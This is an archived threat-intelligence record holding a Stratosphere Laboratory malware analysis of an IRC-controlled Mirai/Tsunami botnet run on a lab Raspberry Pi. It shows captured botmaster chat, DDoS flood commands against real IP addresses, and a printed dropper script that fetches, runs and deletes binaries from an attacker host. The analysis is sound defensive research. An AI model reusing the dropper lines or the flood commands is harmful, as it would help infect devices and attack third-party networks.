{ "id": "523e5eb6-d0a1-4476-a7cd-5a26dfce6296", "created_at": "2026-04-06T00:14:00.333517Z", "updated_at": "2026-04-10T03:20:17.069568Z", "deleted_at": null, "sha1_hash": "5bfd6211c2558831630691cd5b06931232db32d8", "title": "Analysis of an IRC based Botnet — Stratosphere Laboratory", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 370679, "plain_text": "Analysis of an IRC based Botnet — Stratosphere Laboratory\r\nPublished: 2019-04-18 · Archived: 2026-04-05 16:15:41 UTC\r\nThis blog post was authored by María José Erquiaga (@MaryJo_E), on 2019-04-26\r\nThis blogpost aims to give a insight of an IRCBased botnet describing the network behavior and showing the\r\nanalysis of the C\u0026C. By analyzing this botnet network traffic it was possible to identify the botmasters using an\r\nIRC channel and observe not only the conversation between them but also the orders they give to the bot.\r\nBotnet behavior\r\nThe infected device was a RaspberryPi  (ARMv6) using Raspbian OS. The sample we executed was\r\n49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0, the capture Id is 34-1. According to\r\nVirusTotal, the possible name for that malware sample is Mirai.\r\nAfter running the malware for the first time, the device contacts the IP 185.244.25.235 on port 80/TCP and\r\ndownloads a file called “misp” using GNU Wget agent. It repeats the same action by downloading other files. The\r\nname of the downloaded files are: mips, mipsel, sh4, x86, armv7l, armv6l, i686, powerpc, i586, m68k, sparc and\r\narmv4l.\r\nThen, the bot establishes a connection with the IP 185.244.25.235 on port 6667 and joins an IRC channel called\r\nSummit. The communication with the remote server is the following:\r\nIP 185.244.25.235.6667 \u003e 192.168.1.195.48986:\r\nirc.Summit.gov.GoV NOTICE AUTH :*** Looking up your hostname...\r\nirc.Summit.gov.GoV NOTICE AUTH :*** Found your hostnameIP\r\n192.168.1.195.48986 \u003e 185.244.25.235.6667:\r\nNICK [ARM4T|PCVREB]USER VHIDFQC localhost localhost :VHIDFQC\r\nThe remote server sends a PING and our devices replies with a PONG. Then, the infected device, receives its\r\nfirst order, given by the botmaster which nickname is AmpAttacks:\r\nAmpAttacks :TCP Packeting 66.67.61.168!\r\nThe bot sends SYN NS Packet packets to 66.67.61.168 port 63798. The NS flag, which stands for Nonce Sum, is\r\nstill an experimental flag used to help protect against accidental malicious concealment of packets from the\r\nsender[1]. The services related to the port 63798 are for Apple: Xsan. Xsan Filesystem Access. This means that\r\neither the remote server was using that port for another service or that the botnet owners knew, or the attack aimed\r\nto an Apple device.\r\nThe domain registered to that IP is rr.com. The nmap scanning to that IP reveals that all ports are filtered, it also\r\nreveals that the host is up using the domain cpe-66-67-61-168.rochester.res.rr.com.\r\nhttps://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet\r\nPage 1 of 9\n\nThe bot then sends an IRC Packet to report the successful end of AmpAttack TCP Flood Against 66.67.61.168:\r\nIRC Packet reporting TCP Flood Against 66.67.61.168\r\nSince our bot is on the IRC channel, it is possible to observe the conversation between the members of that\r\nchannel. According to the IRC RFC [2], the format to send messages on an IRC channel is:\r\nmsgto =/ nickname / ( nickname \"!\" user \"@\" host )\r\nConsidering that format, it is possible to identify the nicknames and users in the channel, some of them are:\r\nSpoof, Tragedy, Erradic and AmpAttacks.\r\nIn the conversation, the botmasters are talking about IRC. Some of the conversation is transcript here:\r\nIP 185.244.25.235 \u003e 192.168.1.195:irc.Summit.gov.GoV MODE ##Summit +q Spoof\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :crazy how i know rock shit about ircs lmdao\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :fao*\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :crazy how i know rock shit about ircs lmdao\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :fao*\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :It's literally just a chatting program\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :But the IRC bot forces the device to join the channel as anothe\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :And they listen\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :!* makes them listen\r\nTragedy!Erradic@Summit.gov.GoV MODE ##Summit +v [x86_64|BWQLXKB]\r\nTragedy!Erradic@Summit.gov.GoV MODE ##Summit +v [MIPS|WGEQAV]\r\nTragedy!Erradic@Summit.gov.GoV MODE ##Summit +v [ARM4T|PCVREB]\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :???\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :Giving them a voice so they can reply\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :This is the part I need to fix\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :!* STD 1.1.1.1 1 1\r\nOur bot replies:\r\n##Summit :STD Packeting 1.1.1.1!\r\nThe bot sends two kind of packets to the IP 1.1.1.1. Those are:\r\nhttps://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet\r\nPage 2 of 9\n\n1. To the IP 1.1.1.1 on port 256/UDP: bad length 4096 \u003e 1472\r\nSUMMIT.. %s, STD Flood Against %s Finished!....Incorrect Usage, %s :XMAS \u003cTarget\u003e \u003cPort\u003e \u003cTime\u003e 32 1024 1\r\n....Incorrect Usage, %s :RawUDP \u003cTarget\u003e \u003cTime\u003e\r\n.... %s :RawUDP Packeting %s!\r\n.. %s, RawUDP Flood Against %s Finished!\r\n2. To the IP 1.1.1.1: ip-proto-17\r\n........./bin/sh.sh..-c..................................................(nil)...(null)..+.-. .0x.0X....\r\nFor the attack on port 256/UDP, there were 2159 packets observed and for the TCP attack 2202 packets were\r\nobserved.\r\nThe attacked IP 1.1.1.1 is a DNS server [2]. Once the flood is finished, the bot reports to the master:\r\nTragedy, TCP Flood Against 1.1.1.1 Finished!\r\nThen, the conversation between the botmasters:\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :I forgot to enable raw headers\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :They'll say \"@Tragedy : TCP Packeting 1.1.1.1\"\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :Then when the flood is over they'll say \"@Tragedy, your TCP flo\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :!* TCP 50.50.50.53 53 10 32 syn 0 10\r\nOur Bot reports that its starting the attack:\r\nAmpAttacks :TCP Packeting 50.50.50.53!\r\nThe bot sends SYN packets to the IP 50.50.50.53 on port 53. There is no information regarding this IP, Registrant\r\nName: REDACTED FOR PRIVACY. Only the country information (US) and AS (5650, Frontier\r\nCommunications of America, Inc.) was available. When the bot finished the flood, it reports it to the masters:\r\nAmpAttacks, TCP Flood Against 50.50.50.53 Finished!\r\n:irc.Summit.gov.GoV 421 [ARM4T|PCVREB] AmpAttacks, :Unknown command\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :eww yarn\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :lol imagine saying ew to servers\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :Googles and Amazons constantly leave and join back\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :eww servers\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :i call huawei\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :because I'm constantly loading\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :and dupes leave and rejoin\r\nAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :what I mean is\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :the same bot\r\nhttps://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet\r\nPage 3 of 9\n\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :trying to rejoin\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :You can right click on a bot and get all its info with Whois\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :* [x86_64|ZBGMF] (PDCVY@Zombie-190A588A.us-west-2.compute.amazonaws\r\nThen, more than 10 bots joins to the IRC channel, those are machines from Google and Amazon that are leaving\r\nand rejoining the channel, the bot masters talked about it:\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :\u003c~AmpAttacks\u003e and dupes leave and rejoin\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :\u003c~Tragedy\u003e This doesn't allow dupes Lol the Unreal config Max per I\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :\u003c~AmpAttacks\u003e what I mean is\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :\u003c~AmpAttacks\u003e the same bot\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :\u003c~AmpAttacks\u003e trying to rejoin\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :\u003c~Tragedy\u003e You can right click on a bot and get all its info with W\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :-\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] is GOVHTWTH@Zombie-3E8CF5D5.rev.home.ne.jp * GOVHTWTH\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] is using modes +iwxG\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] is connecting from *@116-220-1-247.rev.home.ne.jp 116\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] on ##Summit\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] using irc.Summit.gov.GoV Summit.gov\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] has been idle 2hrs 54mins 32secs, signed on Fri Dec 2\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] End of /WHO\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :.ACTION .8Hits you with a swift Yeet.\r\nEntity!Entity@Summit.gov.GoV PRIVMSG ##Summit :we're also testing the curl for thinkphp rn\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :*die*\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :.ACTION .4Slaps everyone with a large trout in a single swing..\r\nRegarding our bot name: [ARM4T|PCVREB] and the names of the bots that have joined the channel, we can\r\nassume that the names of the bots have the architecture on it, for instance [MIPS|DINPVL], or\r\n[x86_64|ZBGMF]. The botmasters talked about this here:\r\nConversation between the botmasters\r\nThe conversation between the botmasters continues and the bot receives more orders, botmasters that were not on\r\nthe previous chat write on the channel:\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :Theres no help cmd\r\nshadoh!shadoh@Summit.gov.GoV MODE ##Summit +v [x86_64|ITVX]\r\nhttps://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet\r\nPage 4 of 9\n\nshadoh!shadoh@Summit.gov.GoV PRIVMSG ##Summit :rip\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :I didn't set the raw headers mode yet\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :Was making sure floods worked\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :And they do (:\r\n....\r\nshadoh!shadoh@Summit.gov.GoV PRIVMSG ##Summit :!* XMAS 123.59.209.185 80 30 32 1024 10\r\nThe order from the botmaster specifies to perform a XMAS attack to the IP address 123.59.2019.185 on port 80.\r\nThis is a DoS attack that sends packets to an IP and it changes the TCP headers to become harder to process for\r\nthe target.  \r\nThe bot sends packets to the IP 123.59.209.185 on port 80. The IP is registered in China, and the network name is\r\nCloudVsp. At the moment, the IP is not active. The packets header sent by the bot looks like this:\r\nIP 192.168.1.195.65279 \u003e 123.59.209.185.80: Flags [SP.U], seq 4278190079:4278191103, ack 0, win 65279, urg 0, l\r\nIt is possible to observe that the TCP flag set in this case is SP.U, it means that Syn, Push and Urgent are set at the\r\nsame time. While the bot is attacking, it also receives more orders from the same botmaster:\r\nshadoh!shadoh@Summit.gov.GoV PRIVMSG ##Summit :!* XMAS 123.59.209.185 80 30 32 1024 10\r\nThe botmaster sends the same message 9 times in total, mean while, the conversation between the attackers\r\ncontinues:\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :yooo\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :We reppin Guandong over here\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :[IPLookup] Getting Info For -\u003e 119.146.203.154...\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :There we go lmao\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :For the clout\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :\u003c3\r\nTragedy!Erradic@Summit.gov.GoV QUIT :Client has disconnected from Summit.gov\r\nThen, our bot receives another order:\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :!* STD 74.91.117.248 21 25\r\nThe bot replies to inform that it will be performing the received order:\r\n##Summit :STD Packeting 74.91.117.248!\r\nThe domain of that IP is craftdiggers.g.nfoservers.com [4]. While doing the flood, the bot sends 2 kind of packets:\r\nhttps://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet\r\nPage 5 of 9\n\n1. IP address 74.91.117.248, port 5376/UDP, bad length 4096 \u003e 1472\r\n2. IP address 74.91.117.248: ip-proto-17\r\nAfterwards, the bot receives more orders to perform a DoS attack on port 80:\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :!* TCP 71.61.66.148 80 22 32 syn 0 10\r\nOur bot informs that the attack will be performed:\r\nSpoof :TCP Packeting 71.61.66.148!\r\nThen, the bot informs that the attack is finished;\r\nSpoof, TCP Flood Against 71.61.66.148 Finished!\r\nIn this case, the domain name registered for the IP 71.61.66.148 is comcast.net.\r\nAfter that, the bot tries to join the channel again several times, but it fails, the sequence is the following:\r\n1. The bot sends Syn packets to the remote server 185.244.25.235 on port 6667\r\n2. The remote server replies with a TCP packet (P. flag):\r\n1. irc.Summit.gov.GoV NOTICE AUTH :*** Looking up your hostname…\r\n2. irc.Summit.gov.GoV NOTICE AUTH :*** Found your hostname\r\n3. The bot replies:\r\n1. NICK [ARM4T|PCVREB]\r\n2. USER VHIDFQC localhost localhost :VHIDFQC\r\n4. The remote server replies:\r\n:irc.Summit.gov.GoV 433 * [ARM4T|PCVREB] :Nickname is already in use.\r\n After trying several times, one of the connections succeed :\r\n[ARM4T|PCVREB]!VHIDFQC@Zombie-6024A57C.felk.cvut.cz JOIN :##Summit\r\nHowever, there seems to be a connection error, there is ping timeout: 32 seconds. Then, the remote server sends  a\r\nF packet and the connection is over. This process is repeated several times.\r\nThe bot tries to contact the remote server on port 6667 several times. It is using different user name, first using the\r\nnickname HVLLTLBT, then using PCVREB. This could be possible because several scripts were downloaded\r\nhttps://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet\r\nPage 6 of 9\n\nand executed at the same time to guaranteed the botnet operation.\r\nAnalysis for the extracted files\r\nThe downloaded files by the malware were extracted and analyzed on VirusTotal, most of the files were uploaded\r\nby us for the first time. The possible name for those samples is “Tsunami”. However, the possible name for the\r\nexecuted sample was “Mirai”. The executed sample downloads scripts that were developed for different\r\narchitectures. This technique ensures that the botnet will run in most of the IoT devices because it downloads\r\nseveral binaries and run them until one of them will work.\r\nList of the SHA256 hashes for the downloaded files by the malware:\r\n31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756\r\nfd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5\r\n284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a\r\n32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3\r\n976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c\r\nf031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221\r\n3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc\r\n34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe\r\n3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f\r\n62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d\r\nAnalysis of the Source Code of the Malware\r\nThe malwares code is a bash script that downloads several scripts, change their mode to +x, to execute, then\r\nexecute the script and delete them.  The files names are different and most of them have the architecture name\r\n(misp, x86, armv7, etc).\r\n#!/bin/bash\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mips; chmod +x mips; ./mips; r\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mipsel; chmod +x mipsel; ./mip\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sh4; chmod +x sh4; ./sh4; rm -\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/x86; chmod +x x86; ./x86; rm -\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv7l; chmod +x armv7l; ./arm\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv6l; chmod +x armv6l; ./arm\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i686; chmod +x i686; ./i686; r\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/powerpc; chmod +x powerpc; ./p\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i586; chmod +x i586; ./i586; r\r\nhttps://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet\r\nPage 7 of 9\n\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/m68k; chmod +x m68k; ./m68k; r\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sparc; chmod +x sparc; ./sparc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv4l; chmod +x armv4l; ./arm\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv5l; chmod +x armv5l; ./arm\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/440fp; chmod +x 440fp; ./440fp\r\nConclusion\r\nThe binary file we used to infect the RPi was a bash script which possible name according to Virus Total is Mirai.\r\nIt downloads files, execute them and then erase them. In order to do that it contacts the server on port 80 and\r\ndownloads the files using GNU Wget agent.\r\nOnce the files were executed, the bot contacts a remote server on port 6667 and joins an IRC channel. The nick\r\nname it uses to joined the channel is: [ARM4T|HVLLTLBT]. It has the architecture of the device on it and a\r\nsome letters. Other bots joins the channel and have the same format name.\r\nOnce our bot is in the channel, it receive orders to perform TCP flood attacks to different IPs.\r\nThis malware could be a variant of a Mirai botnet, because Mirai performs DDoS attacks. However, our bot\r\ndoesn’t seems to scan for other devices on port 22 or 23. It just perform tcp flood to different IPs. Moreover, the\r\nsamples downloaded by the malware were extracted and analyzed on VirusTotal, and the possible name for those\r\nsamples is Tsunami.\r\nReferences\r\n[1] https://tools.ietf.org/html/rfc3540\r\n[2] Internet Relay Chat: Client Protocol. https://tools.ietf.org/html/rfc2812#page-4\r\n[3] https://1.1.1.1\r\n[4] IP: 74.91.117.248\r\nDomain Name: NFOSERVERS.COM\r\nRegistry Domain ID: 109323766_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.godaddy.com\r\nRegistrar URL: http://www.godaddy.com\r\nUpdated Date: 2016-12-30T19:59:34Z\r\nCreation Date: 2004-01-04T20:57:15Z\r\nRegistrar Registration Expiration Date: 2026-01-04T20:57:15Z\r\nRegistrar: GoDaddy.com, LLC\r\nRegistrar IANA ID: 146\r\nNetRange:     74.91.117.0 - 74.91.117.255\r\nCIDR:          74.91.117.0/24\r\nNetName:     NFOSERVERS-SEA-1\r\nNetHandle:   NET-74-91-117-0-1\r\nhttps://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet\r\nPage 8 of 9\n\nParent:          NFOSERVERS-1 (NET-74-91-112-0-1)\r\nNetType:       Reassigned\r\nOriginAS:      AS32751\r\nCustomer:     Nuclearfallout Enterprises, Inc. (C02882606)\r\nAcknowledge\r\nThis research was done as part of our ongoing collaboration with Avast Software in the Aposemat project. The\r\nAposemat project is funded by Avast Software.\r\nThanks to Veronica Valeros for her help in the analysis and writing corrections.\r\nSource: https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet\r\nhttps://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet" ], "report_names": [ "analysis-of-a-irc-based-botnet" ], "threat_actors": [], "ts_created_at": 1775434440, "ts_updated_at": 1775791217, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5bfd6211c2558831630691cd5b06931232db32d8.pdf", "text": "https://archive.orkl.eu/5bfd6211c2558831630691cd5b06931232db32d8.txt", "img": "https://archive.orkl.eu/5bfd6211c2558831630691cd5b06931232db32d8.jpg" } }